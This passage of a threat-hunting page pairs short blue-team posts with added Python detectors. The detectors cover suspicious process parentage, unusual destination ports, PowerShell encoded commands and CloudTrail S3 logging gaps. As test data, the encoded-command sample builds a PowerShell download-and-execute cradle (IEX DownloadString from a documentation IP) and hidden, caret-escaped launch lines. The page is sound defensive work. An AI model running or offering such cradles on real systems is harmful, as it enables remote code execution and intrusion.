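        if actual_dir.lower() != exp_dir:
            reasons.append(f"{name} running from {actual_dir} instead of {exp_dir}")
        if parent not in exp_parents:
            reasons.append(f"{name} has parent {parent}, expected one of {sorted(exp_parents)}")
    return reasons


def process_chain(events, pid):
    """Walk ProcessId -> ParentProcessId and return the chain of image names, child first."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def hunt_process_chains(events):
    """Map ProcessId -> reasons for every event that tripped a rule."""
    return {e["ProcessId"]: r for e in events if (r := triage_process(e))}


OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
SAMPLE_EVENTS = [  # constructed Sysmon EID 1 records from one host, not real telemetry
    {"ProcessId": 100, "ParentProcessId": 1, "Image": "C:\\Windows\\explorer.exe",
     "ParentImage": "C:\\Windows\\System32\\userinit.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": OFFICE,
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": OFFICE},
    {"ProcessId": 400, "ParentProcessId": 50, "Image": "C:\\Windows\\System32\\svchost.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 600, "ParentProcessId": 40, "Image": "C:\\Windows\\System32\\lsass.exe",
     "ParentImage": "C:\\Windows\\System32\\wininit.exe"},
]

if __name__ == "__main__":
    for pid, reasons in hunt_process_chains(SAMPLE_EVENTS).items():
        print(pid, " <- ".join(process_chain(SAMPLE_EVENTS, pid)), "|", "; ".join(reasons))
```

Only PIDs 300 and 500 come back: the PowerShell under WINWORD.EXE (chain powershell.exe <- winword.exe <- explorer.exe) and the "svchost.exe" that lives in a Temp directory and was started by Explorer rather than services.exe. The real svchost.exe and lsass.exe pass because both their path and their parent match the baseline.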

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-08-27

For your threat hunting tip of the day:

Once the malware was downloaded it started reaching out to some non-standard ports. Not only did the ports stick out as odd but the executables or programs doing it seemed strange as well. One example is the MSBuild.exe (an executable masquerading as a legitimate process) connected to an IP over port 6000.

Using speedguide.net as a reference to see what legitimate programs use port 6000, I see Medal of Honor Rising Sun, Madden NFL 2005, Army of Two for the PlayStation 3, and other games. BUT, if we look at the first part of the table we see that it has been used by different trojans. So the question you should ask yourself is this: Is someone playing PlayStation in my corporate environment, and an old one at that, or is this strange port something I should look into?

So, look for non-standard ports that aren't tied to business or legitimate processes and do some research to see what they possibly could be! I hope this helps! Enjoy and Happy Hunting!

@cyborg Security @Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting
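
The port tip above and the 2025-02-19 suggestion to hunt unstructured across processes making network connections both come down to one question: does this process normally talk on this port? The block below is an added example for this page, not a Cyborg Security / Intel 471 hunt package. It triages constructed Sysmon event 3 (network connection) records against a per-process port baseline and a set of "ordinary" ports; both lists and the MSBuild.exe-to-port-6000 sample are assumptions modelled on the post, and the baseline should be learned from your own environment rather than copied.

```python
"""Hunt: processes connecting to ports outside their baseline.  Added example over
constructed Sysmon event 3 records; baselines are assumptions."""
import ntpath
from collections import Counter

# Ports one expects to see from a fleet regardless of process (assumption; learn from your data)
ORDINARY_PORTS = {22, 25, 53, 80, 88, 123, 135, 139, 389, 443, 445, 464, 587, 636, 993,
                  3268, 3389, 5985, 5986, 8080, 8443}
# Ports each process was seen using during a baseline period (assumption)
BASELINE = {
    "chrome.exe": {80, 443},
    "outlook.exe": {443, 587, 993},
    "svchost.exe": {53, 80, 123, 135, 443},
    "lsass.exe": {88, 389, 445, 464, 636, 3268},
}


def triage_connection(ev, baseline=BASELINE):
    """Finding for a connection outside the baseline, or None when it matches."""
    name, port = ntpath.basename(ev["Image"]).lower(), int(ev["DestinationPort"])
    if name in baseline and port in baseline[name]:
        return None
    if name not in baseline:
        reason, sev = "process has no network baseline", "high"
    else:
        reason, sev = "port outside process baseline", "medium"
    if port not in ORDINARY_PORTS:
        reason, sev = reason + "; non-standard port", "high"
    return {"host": ev["Computer"], "image": name, "port": port,
            "dst": f"{ev['DestinationIp']}:{port}", "severity": sev, "reason": reason}


def hunt_connections(events, baseline=BASELINE):
    """Findings ordered by severity, then by how rare the (process, port) pair is fleet-wide."""
    found = [f for f in (triage_connection(e, baseline) for e in events) if f]
    prevalence = Counter((f["image"], f["port"]) for f in found)
    rank = {"high": 0, "medium": 1}
    return sorted(found, key=lambda f: (rank[f["severity"]], prevalence[(f["image"], f["port"])]))


def _ev(host, image, ip, port):
    return {"Computer": host, "Image": image, "DestinationIp": ip, "DestinationPort": port}


SAMPLE_EVENTS = [  # constructed; IPs from the documentation ranges, not real telemetry
    _ev("WS01", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "203.0.113.20", 443),
    _ev("WS01", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "203.0.113.21", 8443),
    _ev("WS02", "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "198.51.100.7", 6000),
    _ev("WS03", "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "203.0.113.30", 993),
    _ev("WS01", "C:\\Windows\\System32\\svchost.exe", "192.0.2.10", 53),
    _ev("WS04", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "203.0.113.21", 8443),
]

if __name__ == "__main__":
    for f in hunt_connections(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["image"], f["dst"], "|", f["reason"])
```

MSBuild.exe talking to port 6000 sorts to the top: the process has no network baseline at all and the port is not one the fleet normally uses. The two Chrome connections to 8443 are a baseline gap rather than an alarm (a common port, seen on more than one host), which is the kind of noise an unstructured hunt converts into a better baseline. In development shops MSBuild legitimately reaches package feeds, so keep baselines per host role.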

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-08-26

Here is your Threat Hunting Tip of the Day:

In The DFIR Report the attackers abused #PowerShell to execute encoded commands to hide their true activity from the defenders or the victims. Normally, PowerShell needs a parameter that tells it that the following command will be encoded, which is any valid variation of the "-encodedcommand" parameter. Now, this ranges from -e to -EnCoDeDcOmMaNd and everything in between to INCLUDE escape characters! So what are defenders to do?

You could leverage this Intel 471 Free Community Hunt Package that looks for these variations using regular expressions! Now, this will help you identify the encoded commands that are run in your organization and possibly by attackers, but be warned! False positives are a thing and once you start removing them you should have a better idea of what is abnormal. You can also use open source tools like CyberChef to decode the commands so you can make them human readable!

I hope this gets you started on your Threat Hunting journey, good luck and Happy Hunting!

Powershell Encoded Command Execution
hunter.cyborgsecurity.io/resea

Cyborg Security #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting
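
The "Powershell Encoded Command Execution" package (linked here and in the 2025-02-21 post) matches the switch variations with a regular expression; the block below is an added example of the same idea written for this page, not the Intel 471 community hunt package itself. powershell.exe accepts -ec and any prefix of -EncodedCommand (from -e up to the full name) in any case, optionally followed by a colon, so the regex is generated from those prefixes rather than typed by hand. Command lines are constructed, with the encoded blobs produced in the block so they are genuine UTF-16LE/base64 encodings; stripping cmd.exe carets and quotes before matching is a heuristic assumption that covers the escape-character trick mentioned above.

```python
"""Hunt: PowerShell launched with an encoded command, whatever spelling of the switch was used,
and decode the payload for the analyst.  Added example over constructed command lines."""
import base64
import binascii
import re

# -ec plus every prefix of -EncodedCommand: e, en, enc, ... encodedcommand (longest first)
_PREFIXES = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)(?P<flag>-(?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True)) + r"))"
    r"(?:\s+|:)\s*(?P<blob>[A-Za-z0-9+/=]{16,})")


def normalise(cmdline):
    """Drop cmd.exe caret escapes and double quotes so -^e^c and "-enc" read as -ec / -enc."""
    return cmdline.replace("^", "").replace('"', "")


def decode_encoded_command(blob):
    """Base64 -> UTF-16LE text, or None if the blob is not a valid encoded command."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def find_encoded_command(cmdline):
    """{'flag', 'blob', 'decoded'} for the first encoded-command switch in a command line, or None."""
    m = ENC_FLAG.search(normalise(cmdline))
    if not m:
        return None
    return {"flag": m.group("flag"), "blob": m.group("blob"),
            "decoded": decode_encoded_command(m.group("blob"))}


def hunt_encoded(cmdlines):
    return [dict(cmd=c, **hit) for c in cmdlines if (hit := find_encoded_command(c))]


def encode_command(script):
    """How the blob is built in the first place: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# constructed payload; the URL uses a documentation address and is not a real indicator
_PAYLOAD = encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")
SAMPLE_CMDLINES = [  # constructed, not real telemetry
    f"powershell.exe -nop -w hidden -enc {_PAYLOAD}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    f"cmd.exe /c powershell -^E^c {_PAYLOAD}",
    f'powershell "-EnCoDeDcOmMaNd":{_PAYLOAD}',
    'powershell -ep bypass -Command "Get-Date"',
]

if __name__ == "__main__":
    for hit in hunt_encoded(SAMPLE_CMDLINES):
        print(hit["flag"], "->", hit["decoded"])
```

Three of the five sample lines are hits, including the caret-escaped -^E^c form and the mixed-case colon form; -ExecutionPolicy and -ep are not mistaken for the switch because the pattern requires whitespace or a colon right after the prefix. Expect legitimate hits too (management agents and some installers use -EncodedCommand), so the decoded text, not the switch alone, is what separates the false positives from the adversary's activity.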

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-08-23

Threat Hunting Tip of the Day:

I know I normally steer you to a Cyborg Security and Intel 471 Hunt package but something about this report stuck out that could be an issue in many organizations and that can be summed up to one word: visibility!

Under the "Data Access and Impact (TA0010 and TA0040)" section, it states that "CloudTrail S3 data logging and S3 server access logging was not enabled...no logs existed that showed exfiltration activity from the S3 buckets." [1]

Lesson learned: IF you are migrating to the cloud or bringing new hardware/software, assets, etc into your environment, please take time to assess what level of logging exists, and determine what is valuable to ingest. Taking that time will be worth it in the long run and allow your analysts to dig through logs, create detections, and threat hunt in your environment! Enjoy and Happy Hunting!

[1] unit42.paloaltonetworks.com/sh

#CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #gethunting
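
The visibility gap quoted above is checkable before an incident: management events alone never record GetObject, so a trail has to carry S3 data-event selectors for the buckets that matter. The block below is an added example for this page, not code from the Unit 42 report. It evaluates selector documents constructed in the shape the CloudTrail GetEventSelectors API returns (the same shape boto3's cloudtrail client get_event_selectors() hands back, which is an assumption about how you would feed it); both the classic EventSelectors form and AdvancedEventSelectors are handled, and the sample trails are constructed.

```python
"""Check: does a CloudTrail trail record object-level S3 events for a bucket, and would an
exfiltration (a read) actually show up?  Added example over constructed selector documents."""


def s3_data_event_coverage(trail_selectors, bucket):
    """'All' / 'ReadOnly' / 'WriteOnly' when object-level events for the bucket are recorded,
    or None when a read from it would leave no CloudTrail record."""
    obj_prefix = f"arn:aws:s3:::{bucket}/"  # object ARNs in the bucket start with this
    # Classic selectors: DataResources of type AWS::S3::Object whose value is a prefix of the
    # bucket's object ARNs; 'arn:aws:s3' or 'arn:aws:s3:::' is the all-buckets catch-all.
    for sel in trail_selectors.get("EventSelectors", []):
        for dr in sel.get("DataResources", []):
            if dr.get("Type") == "AWS::S3::Object" and any(
                    obj_prefix.startswith(v) for v in dr.get("Values", [])):
                return sel.get("ReadWriteType", "All")
    # Advanced selectors: eventCategory=Data and resources.type=AWS::S3::Object; an absent
    # resources.ARN field means every bucket, StartsWith narrows it; readOnly narrows direction.
    for sel in trail_selectors.get("AdvancedEventSelectors", []):
        fields = {f["Field"]: f for f in sel.get("FieldSelectors", [])}
        if fields.get("eventCategory", {}).get("Equals") != ["Data"]:
            continue
        if fields.get("resources.type", {}).get("Equals") != ["AWS::S3::Object"]:
            continue
        arn = fields.get("resources.ARN")
        if arn and not any(obj_prefix.startswith(v) for v in arn.get("StartsWith", [])):
            continue
        ro = fields.get("readOnly", {}).get("Equals")
        if ro == ["true"]:
            return "ReadOnly"
        if ro == ["false"]:
            return "WriteOnly"
        return "All"
    return None


def exfil_visible(coverage):
    """A GetObject-style exfiltration is a read; write-only data logging does not show it."""
    return coverage in ("All", "ReadOnly")


def audit_buckets(trail_selectors, buckets):
    """bucket -> (coverage, exfil visible) for the buckets you would need to investigate."""
    return {b: (c := s3_data_event_coverage(trail_selectors, b), exfil_visible(c)) for b in buckets}


# constructed trails, not real account data
TRAIL_MGMT_ONLY = {"EventSelectors": [
    {"ReadWriteType": "All", "IncludeManagementEvents": True, "DataResources": []}]}
TRAIL_CLASSIC_ONE_BUCKET = {"EventSelectors": [
    {"ReadWriteType": "All", "IncludeManagementEvents": True,
     "DataResources": [{"Type": "AWS::S3::Object", "Values": ["arn:aws:s3:::finance-data/"]}]}]}
TRAIL_ADVANCED_WRITES_ONLY = {"AdvancedEventSelectors": [
    {"Name": "S3 writes, all buckets", "FieldSelectors": [
        {"Field": "eventCategory", "Equals": ["Data"]},
        {"Field": "resources.type", "Equals": ["AWS::S3::Object"]},
        {"Field": "readOnly", "Equals": ["false"]}]}]}

if __name__ == "__main__":
    for name, trail in [("mgmt-only", TRAIL_MGMT_ONLY), ("classic", TRAIL_CLASSIC_ONE_BUCKET),
                        ("advanced", TRAIL_ADVANCED_WRITES_ONLY)]:
        print(name, audit_buckets(trail, ["finance-data", "hr-data"]))
```

The management-only trail is the situation in the quoted report: nothing for either bucket. The classic trail covers finance-data but not hr-data, and the advanced write-only trail records uploads everywhere yet would still miss a download, which is why the check reports exfiltration visibility separately from coverage.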
